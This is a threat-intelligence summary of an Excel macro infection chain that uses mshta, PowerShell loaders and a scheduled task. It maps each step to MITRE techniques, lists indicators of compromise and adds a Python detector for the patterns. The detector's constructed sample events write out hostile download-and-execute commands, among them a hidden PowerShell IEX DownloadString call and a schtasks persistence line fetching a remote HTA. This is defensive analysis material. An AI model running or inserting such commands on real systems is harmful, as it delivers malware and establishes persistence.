A Convoluted Infection Chain Using Excel – InQuest

Two-sentence summary: An in-depth look at a convoluted infection chain embedded in an Excel document that lures users to enable macros, then unleashes a multi-stage payload across embedded worksheets. The campaign uses obfuscated .NET loaders (Tupak, Chimchim), PowerShell and mshta executions, and scheduled tasks to fetch and run additional payloads while attempting to evade detection. #Tupak #Chimchim #MediaFire #PowerShell #Mshta #LOLBAS #IntelliLock

Keypoints

  • The lure is an Excel document that tries to get the user to enable content to run a hidden payload.
  • Multiple copies of the same Excel workbook are embedded to frustrate users and push them to enable macros.
  • Embedded worksheets appear encrypted; the default Excel password “VelvetSweatshop” is referenced during analysis.
  • The payload chain uses mshta to execute a script from MediaFire and PowerShell to download and run additional components.
  • The downloaded scripts are obfuscated (unescape, hex and string-concatenation tricks); once decoded they yield a GZip-compressed payload that is decompressed before execution.
  • The malware loads .NET assemblies (tupak, chimchim) into memory and uses IntelliLock-like obfuscation and LOLBAS techniques.
  • The campaign schedules tasks (e.g., calsaasdendersw) to periodically contact websites and fetch new payloads, while also attempting to kill other processes to evade defenses.
  • Several samples and hashes are shared on MalwareBazaar, illustrating multiple named binaries and variants used in the campaign.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The lure tries to get the user to enable content so that the hidden payload runs. “The lure here is trying to get the user to enable content in order to run whatever surprise they have hidden inside.”
  • [T1059.001] PowerShell – The campaign involves PowerShell to download and execute payloads. “two calls to the internet. The first one will use PowerShell to download and run a file.”
  • [T1218.005] Signed Binary Proxy Execution: Mshta – The execution uses mshta to run a script from a remote host. “Here we see it will use mshta to run a script from mediafire[.com].”
  • [T1027] Obfuscated/Compressed Files and Information – The payloads are encoded/decrypted as part of the delivery chain. “The first script uses ‘unescape’ to decode the script.”
  • [T1140] Deobfuscate/Decode Files or Information – The unescape/decode/decompress steps are used to render the payload usable. “Once we do the “Unescape”, it is still difficult to read with all of the escape chars and the “+” and ‘+’ concatenation chars.”
  • [T1105] Ingress Tool Transfer – The chain involves downloading and executing payloads from the internet. “two calls to the internet. The first one will use PowerShell to download and run a file.”
  • [T1053.005] Scheduled Task – The malware establishes recurring tasks to fetch payloads and call out to websites. “So our Scheduled task with a name of “calsaasdendersw” will fire every 93 Minutes and call out to a website.”
  • [T1562.001] Impair Defenses – The code kills processes to evade detection and ensure operation. “the Office processes were killed so it will end some of these early.”
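
As an added illustration (not code from the InQuest article), the following Python script turns the three execution patterns summarised above into a small detector over process-creation events: mshta.exe launched with a remote URL, PowerShell invoking a download primitive, and schtasks registering a short-interval task. The log lines are constructed for this example and use defanged or `.invalid` URLs; the task name calsaasdendersw and the 93-minute interval are the only values taken from the article.

```python
"""
Added example, not from the InQuest article: scan constructed process-creation
events for the execution patterns described in the summary. Each event is one
line of the form "<image path>\t<command line>" (a constructed, Sysmon-like layout).
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    technique: str      # MITRE ATT&CK technique id
    reason: str         # why the event was flagged
    command_line: str   # the offending command line


# Constructed sample events. The URLs are placeholders; only the task name and
# the 93-minute interval come from the article.
SAMPLE_EVENTS = """\
C:\\Windows\\System32\\mshta.exe\tmshta.exe https://www.mediafire[.]com/file/EXAMPLE/stage2.hta
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1')"
C:\\Windows\\System32\\schtasks.exe\tschtasks /create /sc minute /mo 93 /tn calsaasdendersw /tr "mshta https://example.invalid/x.hta"
C:\\Windows\\System32\\schtasks.exe\tschtasks /create /sc daily /tn BackupJob /tr "C:\\Tools\\backup.exe"
C:\\Windows\\System32\\mshta.exe\tmshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\local.hta
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Common PowerShell download/execute primitives worth alerting on.
PS_DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)


def check_mshta(image, cmdline):
    """T1218.005: mshta given a remote script location instead of a local file."""
    if image.lower().endswith("mshta.exe") and URL_RE.search(cmdline):
        return Finding("T1218.005", "mshta launched with a remote URL argument", cmdline)
    return None


def check_powershell(image, cmdline):
    """T1059.001 / T1105: PowerShell used as a downloader."""
    if image.lower().endswith("powershell.exe") and PS_DOWNLOAD_RE.search(cmdline):
        return Finding("T1059.001", "PowerShell download/execute primitive", cmdline)
    return None


def check_schtasks(image, cmdline, max_minutes=120):
    """T1053.005: a task created to fire every N minutes, with N at or below max_minutes."""
    if not image.lower().endswith("schtasks.exe"):
        return None
    low = cmdline.lower()
    if "/create" not in low or not re.search(r"/sc\s+minute", low):
        return None
    mo = re.search(r"/mo\s+(\d+)", low)
    interval = int(mo.group(1)) if mo else 1  # schtasks defaults /mo to 1 for MINUTE
    if interval <= max_minutes:
        return Finding("T1053.005", f"task created with {interval}-minute interval", cmdline)
    return None


def parse_events(text):
    """Yield (image, command_line) tuples from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        image, _, cmdline = line.partition("\t")
        yield image, cmdline


def scan(text):
    """Run every check over every event and collect the findings in event order."""
    findings = []
    for image, cmdline in parse_events(text):
        for check in (check_mshta, check_powershell, check_schtasks):
            finding = check(image, cmdline)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.technique}] {f.reason}: {f.command_line}")
```

On the constructed events the scan flags the remote mshta call, the PowerShell DownloadString invocation and the 93-minute task, and leaves the daily backup task and the mshta call on a local file alone; the interval threshold is a tunable starting point, not a fixed rule.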

Indicators of Compromise

  • [File Hash] 2cc30a017cf7312c737be593f36f2d84dd38c285a75512c9ab2e78f0bc1ba48b – Excel document sample
  • [File Hash] 9ef3b6faab18ecb56e819a6b1b6063caf99666d8003a67e55690f27ef92c2b56 – Golaу-Hex.bin
  • [File Name] Golaу-Hex.bin – referenced as a sample blob in the campaign
  • [File Name] asjdiajsidjjaidjasd-Hex.bin – additional sample blob in the campaign
  • [Domain] bazaar.abuse.ch – MalwareBazaar listing for samples
  • [URL] https://bazaar.abuse.ch/sample/9ef3b6faab18ecb56e819a6b1b6063caf99666d8003a67e55690f27ef92c2b56/ – MalwareBazaar sample page
  • [URL] https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create – SchTasks documentation referenced in the article

Read more: https://inquest.net/blog/2022/07/25/convoluted-infection-chain-using-excel